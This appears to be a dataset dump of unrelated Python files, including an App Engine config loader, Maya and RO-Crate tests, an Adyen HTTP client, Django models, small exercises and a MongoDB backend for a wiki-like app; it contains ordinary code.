fileopener: a callable to use for opening a named file. This is
only for use in testing.
Returns:
A config class instance for the options that were uploaded. If there
is no config file, return None
"""
yaml_path = pathfinder()
if yaml_path:
config = Config()
config.ah__conf__load_from_yaml(LoadSingleConf(fileopener(yaml_path)))
logging.debug('Loaded conf parameters from conf.yaml.')
return config
return None
def _get_active_config_key(app_version):
"""Generate the key for the active config record belonging to app_version.
Args:
app_version: the major version you want configuration data for.
Returns:
The key for the active Config record for the given app_version.
"""
return db.Key.from_path(
CONFIG_KIND,
'%s/%s' % (app_version, ACTIVE_KEY_NAME),
namespace=NAMESPACE)
def _fetch_latest_from_datastore(app_version):
"""Get the latest configuration data for this app-version from the datastore.
Args:
app_version: the major version you want configuration data for.
Side Effects:
We populate memcache with whatever we find in the datastore.
Returns:
A config class instance for most recently set options or None if the
query could not complete due to a datastore exception.
"""
rpc = db.create_rpc(deadline=DATASTORE_DEADLINE,
read_policy=db.EVENTUAL_CONSISTENCY)
key = _get_active_config_key(app_version)
config = None
try:
config = Config.get(key, rpc=rpc)
logging.debug('Loaded most recent conf data from datastore.')
except:
logging.warning('Tried but failed to fetch latest conf data from the '
'datastore.')
if config:
memcache.set(app_version, db.model_to_protobuf(config).Encode(),
namespace=NAMESPACE)
logging.debug('Wrote most recent conf data into memcache.')
return config
def _fetch_latest_from_memcache(app_version):
"""Get the latest configuration data for this app-version from memcache.
Args:
app_version: the major version you want configuration data for.
Returns:
A Config class instance for most recently set options or None if none
could be found in memcache.
"""
proto_string = memcache.get(app_version, namespace=NAMESPACE)
if proto_string:
logging.debug('Loaded most recent conf data from memcache.')
return db.model_from_protobuf(proto_string)
logging.debug('Tried to load conf data from memcache, but found nothing.')
return None
def _inspect_environment():
"""Return relevant information from the cgi environment.
This is mostly split out to simplify testing.
Returns:
A tuple: (app_version, conf_version, development)
app_version: the major version of the current application.
conf_version: the current configuration version.
development: a boolean, True if we're running under devappserver.
"""
app_version = os.environ['CURRENT_VERSION_ID'].rsplit('.', 1)[0]
conf_version = int(os.environ.get('CURRENT_CONFIGURATION_VERSION', '0'))
development = os.environ.get('SERVER_SOFTWARE', '').startswith('Development/')
return (app_version, conf_version, development)
def refresh():
"""Update the local config cache from memcache/datastore.
Normally configuration parameters are only refreshed at the start of a
new request. If you have a very long running request, or you just need
the freshest data for some reason, you can call this function to force
a refresh.
"""
app_version, _, _ = _inspect_environment()
global _cached_config
new_config = _fetch_latest_from_memcache(app_version)
if not new_config:
new_config = _fetch_latest_from_datastore(app_version)
if new_config:
_cached_config = new_config
def _new_request():
"""Test if this is the first call to this function in the current request.
This function will return True exactly once for each request
Subsequent calls in the same request will return False.
Returns:
True if this is the first call in a given request, False otherwise.
"""
if RESERVED_MARKER in os.environ:
return False
os.environ[RESERVED_MARKER] = RESERVED_MARKER
return True
def _get_config():
"""Check if the current cached config is stale, and if so update it."""
app_version, current_config_version, development = _inspect_environment()
global _cached_config
if (development and _new_request()) or not _cached_config:
_cached_config = _fetch_from_local_file() or Config()
if _cached_config.ah__conf__version < current_config_version:
newconfig = _fetch_latest_from_memcache(app_version)
if not newconfig or newconfig.ah__conf__version < current_config_version:
newconfig = _fetch_latest_from_datastore(app_version)
_cached_config = newconfig or _cached_config
return _cached_config
def get(name, default=None):
"""Get the value of a configuration parameter.
This function is guaranteed to return the same value for every call
during a single request.
Args:
name: The name of the configuration parameter you want a value for.
default: A default value to return if the named parameter doesn't exist.
Returns:
The string value of the configuration parameter.
"""
return getattr(_get_config(), name, default)
def get_all():
"""Return an object with an attribute for each conf parameter.
Returns:
An object with an attribute for each conf parameter.
"""
return _get_config()
|
StarcoderdataPython
|
11398515
|
<reponame>sopvop/maya-usd<filename>plugin/pxr/maya/lib/usdMaya/testenv/testUsdMayaGetVariantSetSelections.py
#!/pxrpythonsubst
#
# Copyright 2016 Pixar
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from pxr import UsdMaya
from maya import cmds
from maya import standalone
import os
import unittest
class testUsdMayaGetVariantSetSelections(unittest.TestCase):
@classmethod
def tearDownClass(cls):
standalone.uninitialize()
@classmethod
def setUpClass(cls):
standalone.initialize('usd')
cmds.loadPlugin('pxrUsd')
cls.usdFile = os.path.abspath('CubeWithVariantsModel.usda')
cls.primPath = '/CubeWithVariantsModel'
def setUp(self):
cmds.file(new=True, force=True)
self.assemblyNodeName = cmds.assembly(name='TestAssemblyNode',
type='pxrUsdReferenceAssembly')
cmds.setAttr('%s.filePath' % self.assemblyNodeName, self.usdFile, type='string')
cmds.setAttr('%s.primPath' % self.assemblyNodeName, self.primPath, type='string')
def _SetSelection(self, variantSetName, variantSelection):
attrName = 'usdVariantSet_%s' % variantSetName
if not cmds.attributeQuery(attrName, node=self.assemblyNodeName, exists=True):
cmds.addAttr(self.assemblyNodeName, ln=attrName, dt='string', internalSet=True)
cmds.setAttr('%s.%s' % (self.assemblyNodeName, attrName), variantSelection, type='string')
def testNoSelections(self):
variantSetSelections = UsdMaya.GetVariantSetSelections(self.assemblyNodeName)
self.assertEqual(variantSetSelections, {})
def testOneSelection(self):
self._SetSelection('modelingVariant', 'ModVariantB')
variantSetSelections = UsdMaya.GetVariantSetSelections(self.assemblyNodeName)
self.assertEqual(variantSetSelections, {'modelingVariant': 'ModVariantB'})
def testAllSelections(self):
self._SetSelection('fooVariant', 'FooVariantC')
self._SetSelection('modelingVariant', 'ModVariantB')
self._SetSelection('shadingVariant', 'ShadVariantA')
variantSetSelections = UsdMaya.GetVariantSetSelections(self.assemblyNodeName)
self.assertEqual(variantSetSelections,
{'fooVariant': 'FooVariantC',
'modelingVariant': 'ModVariantB',
'shadingVariant': 'ShadVariantA'})
# Verify that selecting a non-registered variant set affects the
# stage's composition.
prim = UsdMaya.GetPrim(self.assemblyNodeName)
geomPrim = prim.GetChild('Geom')
cubePrim = geomPrim.GetChild('Cube')
attrValue = cubePrim.GetAttribute('variantAttribute').Get()
self.assertEqual(attrValue, 'C')
def testBogusVariantName(self):
self._SetSelection('bogusVariant', 'NotARealVariantSet')
# Invalid variantSet names should not appear in the results.
variantSetSelections = UsdMaya.GetVariantSetSelections(self.assemblyNodeName)
self.assertEqual(variantSetSelections, {})
def testBogusSelection(self):
self._SetSelection('modelingVariant', 'BogusSelection')
# Selections are NOT validated, so any "selection" for a valid
# variantSet should appear in the results.
variantSetSelections = UsdMaya.GetVariantSetSelections(self.assemblyNodeName)
self.assertEqual(variantSetSelections, {'modelingVariant': 'BogusSelection'})
if __name__ == '__main__':
unittest.main(verbosity=2)
|
StarcoderdataPython
|
9688872
|
<reponame>sourav0220/ro-crate-py<filename>test/test_model.py
# Copyright 2019-2020 The University of Manchester, UK
# Copyright 2020 Vlaams Instituut voor Biotechnologie (VIB), BE
# Copyright 2020 Barcelona Supercomputing Center (BSC), ES
# Copyright 2020 Center for Advanced Studies, Research and Development in Sardinia (CRS4), IT
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import uuid
from rocrate.rocrate import ROCrate
from rocrate.model.file import File
from rocrate.model.person import Person
def test_dereferencing(test_data_dir, helpers):
crate = ROCrate()
# verify default entities
root_dataset = crate.dereference('./')
assert crate.root_dataset is root_dataset
metadata_entity = crate.dereference(helpers.METADATA_FILE_NAME)
assert crate.metadata is metadata_entity
preview_entity = crate.dereference(helpers.PREVIEW_FILE_NAME)
assert preview_entity is crate.preview
# dereference added files
sample_file = test_data_dir / 'sample_file.txt'
file_returned = crate.add_file(sample_file)
assert isinstance(file_returned, File)
dereference_file = crate.dereference("sample_file.txt")
assert file_returned is dereference_file
def test_dereferencing_equivalent_id(helpers):
crate = ROCrate()
root_dataset = crate.dereference('./')
assert crate.root_dataset is root_dataset
root_dataset = crate.dereference('')
assert crate.root_dataset is root_dataset
metadata_entity = crate.dereference(helpers.METADATA_FILE_NAME)
assert crate.metadata is metadata_entity
metadata_entity = crate.dereference(f'./{helpers.METADATA_FILE_NAME}')
assert crate.metadata is metadata_entity
def test_contextual_entities():
crate = ROCrate()
new_person = crate.add_person('#joe', {'name': '<NAME>'})
person_dereference = crate.dereference('#joe')
assert person_dereference is new_person
assert person_dereference.type == 'Person'
person_prop = person_dereference.properties()
assert person_prop['@type'] == 'Person'
assert person_prop['name'] == '<NAME>'
assert not new_person.datePublished
def test_properties():
crate = ROCrate()
crate_name = "new crate"
crate.name = crate_name
assert crate.name == crate_name
crate_description = "this is a new crate"
crate.description = crate_description
assert crate.description == crate_description
assert crate.datePublished == crate.root_dataset.datePublished
assert isinstance(crate.root_dataset.datePublished, datetime.datetime)
assert isinstance(crate.root_dataset["datePublished"], str)
crate_datePublished = datetime.datetime.now()
crate.datePublished = crate_datePublished
assert crate.datePublished == crate_datePublished
new_person = crate.add_person('#001', {'name': '<NAME>'})
crate.creator = new_person
assert crate.creator is new_person
assert isinstance(crate.creator, Person)
assert crate.creator['name'] == '<NAME>'
assert crate.creator.type == 'Person'
new_person2 = crate.add_person('#002', {'name': '<NAME>'})
crate.creator = [new_person, new_person2]
assert isinstance(crate.creator, list)
assert crate.creator[0] is new_person
assert crate.creator[1] is new_person2
def test_uuid():
crate = ROCrate()
new_person = crate.add_person(name="No Identifier")
jsonld = new_person.as_jsonld()
assert "Person" == jsonld["@type"]
assert jsonld["@id"].startswith("#")
# Check it made a valid UUIDv4
u = uuid.UUID(jsonld["@id"][1:])
assert 4 == u.version
|
StarcoderdataPython
|
5103060
|
#!/bin/python
from __future__ import absolute_import, division, unicode_literals
import sys
try:
import requests
except ImportError:
requests = None
try:
import pycurl
except ImportError:
pycurl = None
try:
# Python 3
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import HTTPError
except ImportError:
# Python 2
from urllib import urlencode
from urllib2 import Request, urlopen, HTTPError
try:
# Python 2
from StringIO import StringIO
except ImportError:
# Python 3
from io import BytesIO
import json as json_lib
import base64
class HTTPClient(object):
def __init__(self, app_name, user_agent_suffix,
lib_version, force_request=None):
# Check if requests already available, default to urllib
self.user_agent = app_name + " " + user_agent_suffix + lib_version
# In case the app_name is empty
self.user_agent = self.user_agent.strip()
if not force_request:
if requests:
self.request = self._requests_post
elif pycurl:
self.request = self._pycurl_post
else:
self.request = self._urllib_post
else:
if force_request == 'requests':
self.request = self._requests_post
elif force_request == 'pycurl':
self.request = self._pycurl_post
else:
self.request = self._urllib_post
def _pycurl_post(self,
url,
json=None,
data=None,
username="",
password="",
xapikey="",
headers=None,
timeout=30):
"""This function will POST to the url endpoint using pycurl. returning
an AdyenResult object on 200 HTTP responce. Either json or data has to
be provided. If username and password are provided, basic auth will be
used.
Args:
url (str): url to send the POST
json (dict, optional): Dict of the JSON to POST
data (dict, optional): Dict, presumed flat structure
of key/value of request to place
username (str, optional): Username for basic auth. Must be included
as part of password.
password (str, optional): Password for basic auth. Must be included
as part of username.
xapikey (str, optional): Adyen API key. Will be used for auth
if username and password are absent.
headers (dict, optional): Key/Value pairs of headers to include
timeout (int, optional): Default 30. Timeout for the request.
Returns:
str: Raw response received
str: Raw request placed
int: HTTP status code, eg 200,404,401
dict: Key/Value pairs of the headers received.
"""
if headers is None:
headers = {}
response_headers = {}
curl = pycurl.Curl()
curl.setopt(curl.URL, url)
if sys.version_info[0] >= 3:
stringbuffer = BytesIO()
else:
stringbuffer = StringIO()
curl.setopt(curl.WRITEDATA, stringbuffer)
# Add User-Agent header to request so that the
# request can be identified as coming from the Adyen Python library.
headers['User-Agent'] = self.user_agent
if username and password:
curl.setopt(curl.USERPWD, '%<PASSWORD>' % (username, password))
elif xapikey:
headers["X-API-KEY"] = xapikey
# Convert the header dict to formatted array as pycurl needs.
if sys.version_info[0] >= 3:
header_list = ["%s:%s" % (k, v) for k, v in headers.items()]
else:
header_list = ["%s:%s" % (k, v) for k, v in headers.iteritems()]
# Ensure proper content-type when adding headers
if json:
header_list.append("Content-Type:application/json")
curl.setopt(pycurl.HTTPHEADER, header_list)
# Return regular dict instead of JSON encoded dict for request:
raw_store = json
# Set the request body.
raw_request = json_lib.dumps(json) if json else urlencode(data)
curl.setopt(curl.POSTFIELDS, raw_request)
curl.setopt(curl.TIMEOUT, timeout)
curl.perform()
# Grab the response content
result = stringbuffer.getvalue()
status_code = curl.getinfo(curl.RESPONSE_CODE)
curl.close()
# Return regular dict instead of JSON encoded dict for request:
raw_request = raw_store
return result, raw_request, status_code, response_headers
def _requests_post(self, url,
json=None,
data=None,
username="",
password="",
xapikey="",
headers=None,
timeout=30):
"""This function will POST to the url endpoint using requests.
Returning an AdyenResult object on 200 HTTP response.
Either json or data has to be provided.
If username and password are provided, basic auth will be used.
Args:
url (str): url to send the POST
json (dict, optional): Dict of the JSON to POST
data (dict, optional): Dict, presumed flat structure of key/value
of request to place
username (str, optionl): Username for basic auth. Must be included
as part of password.
password (str, optional): Password for basic auth. Must be included
as part of username.
xapikey (str, optional): Adyen API key. Will be used for auth
if username and password are absent.
headers (dict, optional): Key/Value pairs of headers to include
timeout (int, optional): Default 30. Timeout for the request.
Returns:
str: Raw response received
str: Raw request placed
int: HTTP status code, eg 200,404,401
dict: Key/Value pairs of the headers received.
"""
if headers is None:
headers = {}
# Adding basic auth if username and password provided.
auth = None
if username and password:
auth = requests.auth.HTTPBasicAuth(username, password)
elif xapikey:
headers['x-api-key'] = xapikey
# Add User-Agent header to request so that the request
# can be identified as coming from the Adyen Python library.
headers['User-Agent'] = self.user_agent
request = requests.post(url, auth=auth, data=data, json=json,
headers=headers, timeout=timeout)
# Ensure either json or data is returned for raw request
# Updated: Only return regular dict,
# don't switch out formats if this is not important.
message = json
return request.text, message, request.status_code, request.headers
def _urllib_post(self, url,
json=None,
data=None,
username="",
password="",
xapikey="",
headers=None,
timeout=30):
"""This function will POST to the url endpoint using urllib2. returning
an AdyenResult object on 200 HTTP responce. Either json or data has to
be provided. If username and password are provided, basic auth will be
used.
Args:
url (str): url to send the POST
json (dict, optional): Dict of the JSON to POST
data (dict, optional): Dict, presumed flat structure of
key/value of request to place as
www-form
username (str, optional): Username for basic auth. Must be
uncluded as part of password.
password (str, optional): Password for basic auth. Must be
included as part of username.
xapikey (str, optional): Adyen API key. Will be used for auth
if username and password are absent.
headers (dict, optional): Key/Value pairs of headers to include
timeout (int, optional): Default 30. Timeout for the request.
Returns:
str: Raw response received
str: Raw request placed
int: HTTP status code, eg 200,404,401
dict: Key/Value pairs of the headers received.
"""
if headers is None:
headers = {}
# Store regular dict to return later:
raw_store = json
raw_request = json_lib.dumps(json) if json else urlencode(data)
url_request = Request(url, data=raw_request.encode('utf8'))
if json:
url_request.add_header('Content-Type', 'application/json')
elif not data:
raise ValueError("Please provide either a json or a data field.")
# Add User-Agent header to request so that the
# request can be identified as coming from the Adyen Python library.
headers['User-Agent'] = self.user_agent
# Set regular dict to return as raw_request:
raw_request = raw_store
# Adding basic auth is username and password provided.
if username and password:
if sys.version_info[0] >= 3:
basic_authstring = base64.encodebytes(('%s:%s' %
(username, password))
.encode()).decode(). \
replace('\n', '')
else:
basic_authstring = base64.encodestring('%s:%s' % (username,
password)). \
replace('\n', '')
url_request.add_header("Authorization",
"Basic %s" % basic_authstring)
elif xapikey:
headers["X-API-KEY"] = xapikey
# Adding the headers to the request.
for key, value in headers.items():
url_request.add_header(key, str(value))
# URLlib raises all non 200 responses as en error.
try:
response = urlopen(url_request, timeout=timeout)
except HTTPError as e:
raw_response = e.read()
return raw_response, raw_request, e.getcode(), e.headers
else:
raw_response = response.read()
response.close()
# The dict(response.info()) is the headers of the response
# Raw response, raw request, status code and headers returned
return (raw_response, raw_request,
response.getcode(), dict(response.info()))
def request(self, url,
json="",
data="",
username="",
password="",
headers=None,
timout=30):
"""This is overridden on module initialization. This function will make
an HTTP POST to a given url. Either json/data will be what is posted to
the end point. he HTTP request needs to be basicAuth when username and
password are provided. a headers dict maybe provided,
whatever the values are should be applied.
Args:
url (str): url to send the POST
json (dict, optional): Dict of the JSON to POST
data (dict, optional): Dict, presumed flat structure of
key/value of request to place as
www-form
username (str, optional): Username for basic auth. Must be
uncluded as part of password.
password (str, optional): Password for basic auth. Must be
included as part of username.
xapikey (str, optional): Adyen API key. Will be used for auth
if username and password are absent.
headers (dict, optional): Key/Value pairs of headers to include
Returns:
str: Raw request placed
str: Raw response received
int: HTTP status code, eg 200,404,401
dict: Key/Value pairs of the headers received.
:param timout:
"""
raise NotImplementedError('request of HTTPClient should have been '
'overridden on initialization. '
'Otherwise, can be overridden to '
'supply your own post method')
|
StarcoderdataPython
|
3210862
|
import os
from django.db import models
from django.contrib.auth.models import User
from ckeditor_uploader.fields import RichTextUploadingField
from applications.alumniprofile.models import Profile
from applications.events_news.models import Event
from applications.gallery.models import Album
def upload_photo(instance, filename):
name, extension = os.path.splitext(filename)
return 'Chapter_Walls/' + str(instance.name) + ".jpg"
class Constants:
POST = (
('President', 'President'),
('Hon. Secretary', 'Hon. Secretary'),
('Treasurer', 'Treasurer'),
('Other', 'Other')
)
class Chapters(models.Model):
name = models.CharField(max_length=100)
description = RichTextUploadingField(blank=True, null=True)
wall_picture = models.ImageField(null=True, blank=True, upload_to=upload_photo)
created = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.name
class ChapterTeam(models.Model):
chapter = models.ForeignKey(Chapters, on_delete=models.PROTECT)
user = models.ForeignKey(User, on_delete=models.PROTECT)
post = models.CharField(choices=Constants.POST, max_length=50)
other_post = models.CharField(max_length=100, blank=True, null=True)
def __str__(self):
return 'Chapter: ' + str(self.chapter) + ' User: ' + str(self.user) + ' Post: ' + str(self.post)
class ChapterEvent(models.Model):
chapter = models.ForeignKey(Chapters, on_delete=models.CASCADE)
event = models.ForeignKey(Event, on_delete=models.CASCADE)
class Meta:
unique_together = (('chapter', 'event'),)
def __str__(self):
return 'Chapter: ' + str(self.chapter) + ' Event: ' + str(self.event)
class ChapterAlbum(models.Model):
chapter = models.ForeignKey(Chapters, on_delete=models.CASCADE)
album = models.ForeignKey(Album, on_delete=models.CASCADE)
class Meta:
unique_together = (('chapter', 'album'),)
def __str__(self):
return 'Chapter: ' + str(self.chapter) + ' Event: ' + str(self.album)
|
StarcoderdataPython
|
3444815
|
<filename>year1/python/week3/q24_rot13.py
### This program uses ROT13 encryption used in the first century ###
import string
def substituteCharacter(uncryp):
encryp_const = 13
## One possible method to code this function is shown below but requires more lines
## alphabet = list(string.ascii_lowercase)
##
## str1 = alphabet[:encryp_const]
## str2 = alphabet[encryp_const:]
##
## zipped = zip(str1,str2)
## encryp = dict(zipped)
##
char = ord('a') # Starting character
d = {chr(char):chr(char+encryp_const) for char in range(char, char + encryp_const)}
if(uncryp in d):
cryp = d[uncryp]
return cryp
elif(ord(uncryp) < char or ord(uncryp) > (char + 2*len(d))):
return 'Invalid Input'
else:
uncryp = ord(uncryp) - encryp_const
cryp = chr(uncryp)
return cryp
uncryp = input("WeLcOmE tO cRyPtIc VeRsIoN x.Y.z! PlEaSe InPuT a ChArAcTeR: ")
cryp = substituteCharacter(uncryp)
print("An uncryptic \'{}\' generates a cryptic \'{}\'".format(uncryp, cryp))
|
StarcoderdataPython
|
1635651
|
from thinsos.core import SOS
|
StarcoderdataPython
|
11323212
|
<gh_stars>10-100
from ..decorators import stere_performer
from ..field import Field
@stere_performer('null_action', consumes_arg=False)
class Root(Field):
"""A simple wrapper over Field, it does not implement a performer method.
Although Root has no specific behaviour, it can be useful when declaring a
root for an Area or RepeatingArea.
Example:
>>> from stere.areas import RepeatingArea
>>> from stere.fields import Root
>>>
>>>
>>> collections = RepeatingArea(
>>> root=Root('xpath', '//table/tr'),
>>> quantity=Text('css', '.collection_qty'),
>>> )
"""
pass
|
StarcoderdataPython
|
8164983
|
import cv2 as cv
src = cv.imread("D:/Images/lena.jpg")
cv.namedWindow("src", cv.WINDOW_AUTOSIZE)
src = cv.cvtColor(src, cv.COLOR_BGR2GRAY)
cv.imshow("src", src)
# 只赋值sigmaX,默认sigmaY = sigmaX
dst1 = cv.blur(src, (5, 5), anchor=(-1, -1), borderType=4)
dst2 = cv.GaussianBlur(src, (5, 5), 15, borderType=4)
dst3 = cv.GaussianBlur(src, (0, 0), 15)
cv.imshow("blur ksize=5", dst1)
cv.imshow("gaussian ksize=5", dst2)
cv.imshow("gaussian sigma=15", dst3)
cv.waitKey(0)
cv.destroyAllWindows()
|
StarcoderdataPython
|
8176071
|
import logging
log = logging.getLogger(__name__)
try:
from PyQt4 import QtCore as QtCore_
from PyQt4 import QtGui as QtGui_
from PyQt4.QtCore import pyqtSlot as Slot, pyqtSignal as Signal
except ImportError, e:
from PySide import QtCore as QtCore_
from PySide import QtGui as QtGui_
from PySide.QtCore import Slot, Signal
QtCore = QtCore_
QtGui = QtGui_
Qt = QtCore_.Qt
__all__ = ['QtCore', 'QtGui', 'Qt', 'Signal', 'Slot']
|
StarcoderdataPython
|
1892363
|
<reponame>AdrianaViabL/Curso-Python-udemy<filename>3 - python POO/113 - docstrings/uma_linha.py
"""documento de uma linha"""
variavel = 'valor'
def funcao():
return 2
|
StarcoderdataPython
|
11359990
|
<filename>udp/test.py
#!/usr/bin/env python3
while True:
try:
user_input = input("username: ")
if not user_input:
raise ValueError('empty string')
else:
break
except ValueError as e:
print(e)
|
StarcoderdataPython
|
114400
|
<reponame>aleasims/Peach
def Test(tester):
from Ft.Lib.DbUtil import EscapeQuotes
for i,out in [('hello','hello'),
("he'llo",r"he\'llo"),
("he'll'o",r"he\'ll\'o"),
("'hello'",r"\'hello\'"),
("'","\\'"),
(r"hhh\\hhhh",r"hhh\\\\hhhh"),
(r"\\",r"\\\\"),
(r"'\\''\\'\\'",r"\'\\\\\'\'\\\\\'\\\\\'"),
(None,r""),
]:
tester.startTest(repr(i))
e = EscapeQuotes(i)
tester.compare(out,e)
tester.testDone()
|
StarcoderdataPython
|
1852353
|
'''ALUMNA: <NAME>
EJERCICIO 06: Merge k Sorted Lists'''
# DESCRIPCION: SE RECIBE UN ARRAY DE K LISTAS VINCULADAS, CADA LISTA VINCULADA SE ORDENA EN ORDEN ASCENDENTE Y SE UNEN EN UNA SOLA LISTA.
import queue
def MergeList(lista):
priority_queue = queue.PriorityQueue() # SE CREA LA COLA DE PRIORIDAD
response = [] # SE CREA EL ARRAY RESULTANTE
for i in lista:
for j in i: # SE VINCULA CADA ELEMENTO DE LA LISTA CON SU PRIORIDAD
priority_queue.put(j)
while not priority_queue.empty(): # SE UNEN LAS LISTAS EN UNA SOLA
response.append(priority_queue.get())
return response
#CASOS DE PRUEBA
def main():
print("[[1,4,5],[1,3,4],[2,6]]")
print(MergeList([[1,4,5],[1,3,4],[2,6]]))
print("[[1,4,5],[1,3,4],[2,6],[7,8]]")
print(MergeList([[1,4,5],[1,3,4],[2,6],[7,8]]))
main()
|
StarcoderdataPython
|
3220616
|
<gh_stars>10-100
from repldex.backend.typings import DatabaseEntry, DatabaseHistoryItem, PartialDatabaseEntry
from typing import Any, Dict, List, Optional, Union
from datetime import datetime
import motor.motor_asyncio
import uuid
import os
connection_uri = os.getenv('dburi')
client = motor.motor_asyncio.AsyncIOMotorClient(connection_uri, connectTimeoutMS=1000) # timeout is 1 sec
db = client['repldex']
entries_coll = db['entries']
sessions_coll = db['sessions']
users_coll = db['users']
config_coll = db['config']
from repldex.discordbot import bot as discordbot
from repldex.backend import images
from repldex import utils
async def fix_entry(data: Any) -> Optional[DatabaseEntry]:
'''Fix entries by adding missing fields.'''
if data is None:
return
original_data = dict(data)
if data.get('image') and isinstance(data['image'], str):
data['image'] = data['image'].replace('imag.cf', 'i.matdoes.dev')
if data.get('image') and isinstance(data.get('image'), str):
data['image'] = await images.get_data(data['image'])
elif data.get('image') and not data['image'].get('thumbnail_b64'):
data['image'] = await images.get_data(data['image']['src'])
if data != original_data:
await entries_coll.update_one({'_id': data['_id']}, {'$set': data})
data['content'] = utils.fix_html(data['content'])
if 'nohtml_content' not in data:
data['nohtml_content'] = utils.remove_html(data['content'])
return data
async def delete_entry(entry_data: DatabaseEntry, editor_id: int):
await discordbot.log_delete(entry_data, editor_id)
await entries_coll.delete_one({'_id': entry_data['_id']})
async def edit_entry(
title: str,
content: str,
editor_id: int,
unlisted: bool = False,
entry_id: str = None,
image: str = None
):
t = datetime.now()
title = title.strip()
await discordbot.log_edit(editor_id, title)
content = utils.fix_html(content)
nohtml_content = utils.remove_html(content)
new_data: PartialDatabaseEntry = {
'title': title,
'content': content,
'last_edited': t,
'nohtml_content': nohtml_content,
'unlisted': unlisted or False
}
if image is not None:
new_data['image'] = await images.get_data(image)
if not entry_id:
entry_id = str(uuid.uuid4())
new_history_data: DatabaseHistoryItem = {
'author': editor_id,
'content': content,
'title': title,
'time': t,
'unlisted': unlisted,
'image': None
}
if image is not None:
new_history_data['image'] = {
'src': image,
'thumbnail_b64': None,
'thumbnail_content_type': None
}
await entries_coll.update_one({'_id': entry_id}, {'$set': new_data, '$push': {'history': new_history_data}}, upsert=True)
return entry_id
async def get_entry(query: Optional[str] = None, entry_id: Optional[str] = None, search_id=True, owner=None) -> Union[DatabaseEntry, None]:
if not entry_id and query:
entries = await search_entries(query, limit=1, search_id=search_id)
if not entries:
return
return entries[0]
elif owner:
found = await entries_coll.find_one({'owner_id': owner})
else:
found = await entries_coll.find_one({'_id': entry_id})
found = await fix_entry(found)
return found
async def new_editor_session(discord_id):
sid = str(uuid.uuid4())
await sessions_coll.insert_one({'_id': sid, 'discord': discord_id, 'time': datetime.now()})
return sid
async def get_editor_session(sid):
if not hasattr(get_editor_session, 'cache'):
get_editor_session.cache = {}
if sid in get_editor_session.cache:
found = get_editor_session.cache[sid]
else:
found = await sessions_coll.find_one({'_id': sid})
get_editor_session.cache[sid] = found
if found is None:
return
return found['discord']
async def search_entries(query: str, limit=10, search_id=True, page=0, discord_id=None, unlisted=False) -> List[DatabaseEntry]:
found: List[DatabaseEntry] = []
match = {'$match': {'unlisted': {'$ne': True}}}
if unlisted:
match = {'$match': {'unlisted': {'$eq': True}}}
async for doc in entries_coll.aggregate([
{'$searchBeta': {'compound': {'should': [
{'search': {'query': query, 'path': 'nohtml_content'}},
{'search': {'query': query, 'path': 'title', 'score': {'boost': {'value': 20}}}},
]}}},
match,
{'$addFields': {'score': {'$meta': 'searchScore'}}},
{'$sort': {'score': -1}},
{'$skip': page * limit},
{'$limit': limit},
]):
fixed_entry = await fix_entry(doc)
if fixed_entry:
found.append(fixed_entry)
if len(found) == 0 and search_id:
found_entry = await get_entry(entry_id=query)
if found_entry:
found = [found_entry]
if len(found) == 0:
searched = await entries_coll.find_one({'title': query, 'unlisted': {'$ne': True}})
if searched:
found = [searched]
if len(found) == 0:
if query.startswith('<@') and query.endswith('>'):
entry_owner_id = query[2:-1]
if entry_owner_id[0] == '!':
entry_owner_id = entry_owner_id[1:]
entry_owner_id = int(entry_owner_id)
owned_entry = await entries_coll.find_one({'owner_id': entry_owner_id})
if entry_owner_id:
found = [owned_entry]
return found
# Query is only if sort == relevant
async def get_entries(sort, limit=20, page=0, query=None, discord_id=None, unlisted=False):
# match = {'$match': {'unlisted': {'$ne': True}}}
# if discord_id is not None:
# if discord_id in ADMIN_IDS:
# match = {}
if sort == 'relevant' and query:
found = await search_entries(query, limit=limit, page=page, discord_id=discord_id, unlisted=unlisted)
return found
cursor = entries_coll.find({'unlisted': {'$ne': True}})
cursor = cursor.sort(sort, -1)
cursor = cursor.skip(page * limit)
cursor = cursor.limit(limit)
found = []
async for entry in cursor:
entry = await fix_entry(entry)
found.append(entry)
return found
async def set_personal_entry(discord_id, entry_id):
user_data = {
'personal_entry': entry_id,
}
await users_coll.update_one({'_id': discord_id}, {'$set': user_data}, upsert=True)
async for entry in entries_coll.find({'owner_id': discord_id}):
await entries_coll.update_one({'_id': entry['_id']}, {'$set': {'owner_id': None}})
await entries_coll.update_one({'_id': entry_id}, {'$set': {'owner_id': discord_id}})
try:
if hasattr(get_personal_entry, 'cache'):
get_personal_entry.cache[discord_id] = user_data
except Exception as e:
print('BRUH MOMENT', e)
async def get_personal_entry(discord_id):
if not hasattr(get_personal_entry, 'cache'):
get_personal_entry.cache = {}
if discord_id in get_personal_entry.cache:
found = get_personal_entry.cache[discord_id]
else:
found = await users_coll.find_one({'_id': discord_id})
get_personal_entry.cache[discord_id] = found
if found is None:
return
return found.get('personal_entry')
async def count_entries():
count = await entries_coll.count_documents({'unlisted': {'$ne': True}})
return count
async def get_random_entry():
cursor = entries_coll.aggregate([{'$match': {'unlisted': {'$ne': True}}}, {'$sample': {'size': 1}}])
found = []
async for entry in cursor:
found.append(entry)
return found[0]
async def get_featured_article():
return await config_coll.find_one({'name': 'featured'})
async def set_featured_article(entry_id):
featured = await config_coll.find_one({'name': 'featured'})
if featured:
await config_coll.replace_one({'name': 'featured'}, {'name': 'featured', 'value': entry_id})
else:
await config_coll.insert_one({'name': 'featured', 'value': entry_id})
async def disable_featured():
await config_coll.delete_one({'name': 'featured'})
|
StarcoderdataPython
|
9640478
|
<reponame>moamenibrahim/nlp-project
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from UI.qrangeslider import QRangeSlider
import main
import viewer
class mainWindow(QDialog):
